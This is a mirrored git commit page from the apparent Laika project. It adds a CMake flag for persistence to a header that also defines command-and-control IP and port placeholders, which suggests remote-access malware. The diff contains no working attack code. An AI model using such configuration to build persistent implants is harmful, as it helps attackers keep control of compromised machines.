1
0
mirror of https://github.com/CPunch/Laika.git synced 2025-09-27 04:10:08 +00:00

Added CMake flag for enabling persistence

This commit is contained in:
2022-04-07 19:04:42 -05:00
parent 412418ec0a
commit 2fb0ef29a6
3 changed files with 8 additions and 1 deletions

View File

@@ -12,4 +12,7 @@
#define LAIKA_CNC_IP "@LAIKA_CNC_IP@"
#define LAIKA_CNC_PORT "@LAIKA_CNC_PORT@"
/* settings */
#cmakedefine LAIKA_PERSISTENCE
#endif